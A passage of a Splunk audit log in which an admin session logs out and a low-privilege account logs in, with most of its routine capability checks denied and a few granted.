17:46:34.181, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_health_subset, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_health, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=restart_splunkd, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=list_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.180, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.178, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.178, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.178, user=user, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.174, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:46:34.174, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:46:33.508, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.508, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.470, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.470, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.456, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.456, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.266, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.266, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.252, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:33.252, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.738, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:46:30.737, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:46:30.737, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:46:30.732, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:46:30.359, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.359, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.356, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:46:30.356, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_telemetry_settings, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=list_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=list_tokens_own, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=list_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_tokens_own, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_sourcetypes, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.346, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_health_subset, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_health, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=restart_splunkd, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=list_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.345, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.344, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:30.342, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.342, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:30.342, user=user, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:46:29.810, user=user, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:46:29.542, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.542, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.505, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.505, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.491, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.491, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.304, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.304, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.290, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.290, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:29.118, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:46:29.117, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:46:29.108, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="admin"] Audit:[timestamp=10-06-2022 17:46:28.813, user=user, action=login attempt, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188" method=Splunk" session=355060c8a375361b976ab6a6b757504a] Audit:[timestamp=10-06-2022 17:46:23.138, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="admin"] Audit:[timestamp=10-06-2022 17:46:23.130, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="admin"] Audit:[timestamp=10-06-2022 17:46:22.816, user=admin, action=logout, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188 session=d9da51d9bbcfe0b662ae5295a05ad394] Audit:[timestamp=10-06-2022 17:46:16.841, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:46:06.836, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:46:06.304, user=admin, action=search, info=canceled, search_id='1665078276.5', has_error_warn=false, fully_completed_search=true, total_run_time=0.07, event_count=394, result_count=265, available_count=0, scan_count=394, drop_count=0, exec_time=1665078276, api_et=1665077376.000000000, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=1665077376.000000000, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="92", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_18fb2bf180021f33", app="search", provenance="N/A", mode="historical_batch", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| mcatalog values(metric_name) as metrics WHERE NOT metric_name="*_mrollup_*" AND ("index"="*" OR "index"="_*" ) | mvexpand metrics limit=20000'] Audit:[timestamp=10-06-2022 17:45:56.832, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:45:46.973, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:45:37.773, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:45:26.868, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:45:16.832, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:45:06.835, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:44:56.835, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:44:46.830, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:44:37.022, user=admin, action=search, info=cancel, search_id='1665078276.5'] Audit:[timestamp=10-06-2022 17:44:37.021, user=admin, action=search, info=granted REST: /search/jobs/1665078276.5/control] Audit:[timestamp=10-06-2022 17:44:36.913, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:44:36.883, user=admin, action=search, info=granted REST: /search/jobs/1665078276.5/results] Audit:[timestamp=10-06-2022 17:44:36.836, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:44:36.778, user=admin, action=rest_properties_get, info=granted REST: /static/appLogo_2x.png] Audit:[timestamp=10-06-2022 17:44:36.706, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.706, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.705, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:44:36.689, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:44:36.515, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.515, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.515, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.515, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.514, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, 